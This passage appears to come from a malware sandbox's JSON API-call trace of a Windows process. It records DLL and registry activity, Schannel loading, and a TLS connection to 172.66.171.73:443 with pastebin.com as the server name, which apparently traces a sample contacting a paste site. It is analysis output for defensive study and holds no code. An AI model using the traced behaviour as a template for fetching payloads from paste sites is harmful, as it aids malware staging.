"filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1397 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbb82", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000004b4" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" } ], "repeated": 0, "id": 1398 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbbcc", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "SectionOffset", "value": "0x06d5da60" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1399 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbbdc", "parentcaller": "0x7ffee34bb99e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b8" } ], "repeated": 0, "id": 1400 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34da871", "parentcaller": "0x7ffee10bad69", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 1401 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34da87f", "parentcaller": "0x7ffee10bad69", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1402 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee10bad9e", "parentcaller": "0x7ffee22d0f45", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f10000" }, { "name": "RegionSize", "value": "0x0000a000" } ], "repeated": 0, "id": 1403 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee22d0ed8", "parentcaller": "0x7ffee22d0d4d", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x02f10002", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "dwFlags", "value": "0x00000022" } ], "repeated": 0, "id": 1404 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34a84c4", "parentcaller": "0x7ffee34bd136", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" } ], "repeated": 0, "id": 1405 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbb2a", "parentcaller": "0x7ffee34bb99e", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1406 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbb82", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000004b4" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" } ], "repeated": 0, "id": 1407 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbbcc", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "SectionOffset", "value": "0x06d5da60" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1408 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbbdc", "parentcaller": "0x7ffee34bb99e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b8" } ], "repeated": 0, "id": 1409 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34da871", "parentcaller": "0x7ffee10bad69", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 1410 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34da87f", "parentcaller": "0x7ffee10bad69", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1411 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee10bad9e", "parentcaller": "0x7ffee22d0f45", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f10000" }, { "name": "RegionSize", "value": "0x0000a000" } ], "repeated": 0, "id": 1412 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee22d0ed8", "parentcaller": "0x7ffee22d0d4d", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x02f10002", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "dwFlags", "value": "0x00000022" } ], "repeated": 0, "id": 1413 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34a84c4", "parentcaller": "0x7ffee34bd136", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" } ], "repeated": 0, "id": 1414 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbb2a", "parentcaller": "0x7ffee34bb99e", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1415 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbb82", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000004b4" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" } ], "repeated": 0, "id": 1416 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbbcc", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "SectionOffset", "value": "0x06d5da60" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1417 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34bbbdc", "parentcaller": "0x7ffee34bb99e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b8" } ], "repeated": 0, "id": 1418 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34da871", "parentcaller": "0x7ffee10bad69", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 1419 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34da87f", "parentcaller": "0x7ffee10bad69", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1420 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee10bad9e", "parentcaller": "0x7ffee22d0f45", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f10000" }, { "name": "RegionSize", "value": "0x0000a000" } ], "repeated": 0, "id": 1421 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee167e28a", "parentcaller": "0x7ffec77b0c99", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1422 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee34e5ebd", "parentcaller": "0x7ffee34e5dd8", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xa5\\x91\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1423 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffec77afc47", "parentcaller": "0x7ffec77af179", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "172.66.171.73" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1424 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee22d2f0d", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000460" } ], "repeated": 0, "id": 1425 }, { "timestamp": "2025-11-20 10:58:35,187", "thread_id": "1596", "caller": "0x7ffee347c23a", "parentcaller": "0x7ffee34c37ea", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000458" } ], "repeated": 0, "id": 1426 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffec77b1244", "parentcaller": "0x7ffec77ae8eb", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x7ffe0000ffff" }, { "name": "optname", "value": "0x00007010" }, { "name": "optval", "value": "" } ], "repeated": 0, "id": 1427 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee0264869", "parentcaller": "0x7ffee22d0970", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xc2!\\xc0\\xa8\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1428 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee0a43311", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\schannel" }, { "name": "DllBase", "value": "0x7ffedfaa0000" } ], "repeated": 0, "id": 1429 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee0a43311", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\schannel.dll" }, { "name": "BaseAddress", "value": "0x7ffedfaa0000" } ], "repeated": 0, "id": 1430 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee0a43311", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffedfaa0000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\system32\\schannel.DLL" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 1431 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffee0a4345b", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "schannel.DLL" }, { "name": "ModuleHandle", "value": "0x7ffedfaa0000" }, { "name": "FunctionName", "value": "SpUserModeInitialize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffedfab3ec0" } ], "repeated": 0, "id": 1432 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffedfab3f81", "parentcaller": "0x7ffedfab3efe", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "Handle", "value": "0x000004cc" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1433 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffedfab3fd0", "parentcaller": "0x7ffedfab3efe", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000004cc" }, { "name": "ValueName", "value": "UserContextLockCount" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount" } ], "repeated": 0, "id": 1434 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffedfab4043", "parentcaller": "0x7ffedfab3efe", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000004cc" }, { "name": "ValueName", "value": "UserContextListCount" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount" } ], "repeated": 0, "id": 1435 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffedfab4080", "parentcaller": "0x7ffedfab3efe", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004cc" } ], "repeated": 0, "id": 1436 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d57000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1437 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee0a45563", "parentcaller": "0x7ffee0a451d8", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "0", "pretty_value": "ThreadBasicInformation" }, { "name": "ThreadInformation", "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "1596" } ], "repeated": 0, "id": 1438 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffee0a46943", "parentcaller": "0x7ffee0a45ca2", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "0", "pretty_value": "ThreadBasicInformation" }, { "name": "ThreadInformation", "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "1596" } ], "repeated": 0, "id": 1439 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffec77be76b", "parentcaller": "0x7ffec779c9ba", "category": "network", "api": "WSASend", "status": true, "return": "0x00000000", "arguments": [ { "name": "Socket", "value": "1192" }, { "name": "Buffer", "value": "\\x16\\x03\\x03\\x00\\xae\\x01\\x00\\x00\\xaa\\x03\\x03i\\x1e\\xf4[!J\\xe6>\\xdc\\xd5}\\xd8\\xdf\\xd8\\x90]n\\x9b\\x9f\\xad\\xc7\\x15\\x064}\\xc8\\x15+U\\xf8\\xfe\\xf9\\x00\\x00&\\xc0,\\xc0+\\xc00\\xc0/\\xc0$\\xc0#\\xc0(\\xc0'\\xc0\n\\xc0\t\\xc0\\x14\\xc0\\x13\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\n\\x01\\x00\\x00[\\x00\\x00\\x00\\x11\\x00\\x0f\\x00\\x00\\x0cpastebin.com\\x00\\x05\\x00\\x05\\x01\\x00\\x00\\x00\\x00\\x00\n\\x00\\x08\\x00\\x06\\x00\\x1d\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00\\x00\r\\x00\\x1a\\x00\\x18\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x02\\x01\\x04\\x03\\x05\\x03\\x02\\x03\\x02\\x02\\x06\\x01\\x06\\x03\\x00#\\x00\\x00\\x00\\x17\\x00\\x00\\xff\\x01\\x00\\x01\\x00" } ], "repeated": 0, "id": 1440 }, { "timestamp": "2025-11-20 10:58:35,219", "thread_id": "1596", "caller": "0x7ffec77bb648", "parentcaller": "0x7ffec779c7cd", "category": "network", "api": "WSARecv", "status": false, "return": "0xffffffffffffffff", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1441 }, { "timestamp": "2025-11-20 10:58:35,266", "thread_id": "1596", "caller": "0x7ffee0a46943", "parentcaller": "0x7ffee0a45ca2", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "0", "pretty_value": "ThreadBasicInformation" }, { "name": "ThreadInformation", "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "1596" } ], "repeated": 0, "id": 1442 }, { "timestamp": "2025-11-20 10:58:35,297", "thread_id": "1596", "caller": "0x7ffec77be76b", "parentcaller": "0x7ffec779c9ba", "category": "network", "api": "WSASend", "status": true, "return": "0x00000000", "arguments": [ { "name": "Socket", "value": "1192" }, { "name": "Buffer", "value": "\\x16\\x03\\x03\\x00%\\x10\\x00\\x00! \\x97$.(\\x8f^\\x97WJC\\xb1\\xf0\\x94w\\xc70F\\xd7\\xf3\\x9d\\xb1\\x99\\xa7/\\x87\\x9b\\x9e\\xdb^\\xd6\\x1dr\\x14\\x03\\x03\\x00\\x01\\x01\\x16\\x03\\x03\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00=?X\\xc3\\x88,\\x88\\xb3eZx\\xbf\\x84\\x94?\\xdd\\xcc\\x86\\x0e\\x97\\x91e\\x16y\\xbfVV\\xf3\\xfc\\x9a\\xa6\\x97" } ], "repeated": 0, "id": 1443 }, { "timestamp": "2025-11-20 10:58:35,297", "thread_id": "1596", "caller": "0x7ffec77bb648", "parentcaller": "0x7ffec779c7cd", "category": "network", "api": "WSARecv", "status": false, "return": "0xffffffffffffffff", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1444 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee0a46943", "parentcaller": "0x7ffee0a45ca2", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "0", "pretty_value": "ThreadBasicInformation" }, { "name": "ThreadInformation", "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "1596" } ], "repeated": 0, "id": 1445 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d59000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1446 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffedfab5583", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "sspicli.dll" }, { "name": "BaseAddress", "value": "0x7ffee0a40000" } ], "repeated": 0, "id": 1447 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffedfab5583", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffee0a40000", "arguments": [ { "name": "lpLibFileName", "value": "sspicli.dll" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 1448 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffedfab55a5", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "SspiCli.dll" }, { "name": "ModuleHandle", "value": "0x7ffee0a40000" }, { "name": "FunctionName", "value": "FreeContextBuffer" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee0a44820" } ], "repeated": 0, "id": 1449 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffedfab55c7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\mskeyprotect" }, { "name": "DllBase", "value": "0x7ffecb060000" } ], "repeated": 0, "id": 1450 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffedfab55c7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\NTASN1" }, { "name": "DllBase", "value": "0x7ffee0530000" } ], "repeated": 0, "id": 1451 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffedfab55c7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "mskeyprotect.dll" }, { "name": "BaseAddress", "value": "0x7ffecb060000" } ], "repeated": 0, "id": 1452 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffedfab55c7", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffecb060000", "arguments": [ { "name": "lpLibFileName", "value": "mskeyprotect.dll" }, { "name": "dwFlags", "value": "0x00000800" } ], "repeated": 0, "id": 1453 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffedfab55e9", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", 